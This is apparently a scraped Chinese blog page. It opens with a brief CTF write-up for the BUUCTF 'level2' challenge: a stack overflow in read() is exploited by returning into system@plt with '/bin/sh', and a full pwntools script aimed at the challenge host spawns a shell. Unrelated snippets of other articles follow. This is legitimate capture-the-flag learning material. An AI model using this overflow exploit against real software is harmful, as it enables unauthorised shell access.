张小明
前端开发工程师
使用checksec打开文件查看保护
使用ida打开文件,发现主函数没有什么特别的,直接跟进vulnerable_function函数
发现存在read函数,并且buf缓冲区可以被溢出,由于保护只开启了栈不可执行,因此我们查找一下后门函数
通过plt表来跳转到system函数
system执行完后需要有个返回地址,于是我们随便给个合法地址,在之后写入bin_sh的地址
来让其执行system("/bin/sh")
from pwn import * #p=process('./level2') p=remote('node5.buuoj.cn',25681) system_addr = 0x08048320 fake_ret = 0x08048480 bin_sh = 0x0804A024 pay=b'a'*140+ p32(system_addr) + p32(fake_ret) + p32(bin_sh) p.sendline(pay) p.interactive()为PDF添加书签导航---MESCIUS 的PDF 文档解决方案 2025年12月10日.NET PDF 组件带有书签导航功能,使用户能够快速跳转到复杂的多页文档中的特定内容。MESCIUS 的PDF 文档解决方案.NET PDF 控件中的书签导航功能允许用户使用分层书签列表访问和浏览 PDF 文档中的预定…
李华
“今天做了什么?”——这五个字,像不像老板在你工位上安的监控?别慌,我原来也把日报写成流水账,直到有天发现:隔壁组那个月月拿A的小姐姐,日报居然像微博热搜一样好看!她悄悄告诉我…
李华
UnoCSS与UniAppX架构融合的工程化实践 【免费下载链接】unocss The instant on-demand atomic CSS engine. 项目地址: https://gitcode.com/GitHub_Trending/un/unocss 当我们尝试将原子化CSS引擎UnoCSS集成到UniAppX项目中时,面临的核心挑战是如何在跨平台编…
李华
计算机毕业设计沙县小吃收银系统设计与实现6x7j89(配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。 高峰时段手写单、算价慢、错账多,沙县小吃也急需“扫码即走”的速度…
李华
大文件传输系统技术方案 一、项目背景与需求痛点 公司现有产品需支持100G级大文件传输(上传/下载),涵盖单文件、文件夹(保留层级结构),并满足高稳定性、加密传输/存储、跨平台兼容(含IE8&…
李华
企业介绍: 犀牛云GEO是深圳紫虎软件有限公司旗下品牌。作为国家高新技术企业和深圳市宝安区创新企业50强,品牌聚焦于GEO(AI搜索优化)领域,已累计服务超过200家全球企业,其中包括华为、顺丰等众多上市公司。…
李华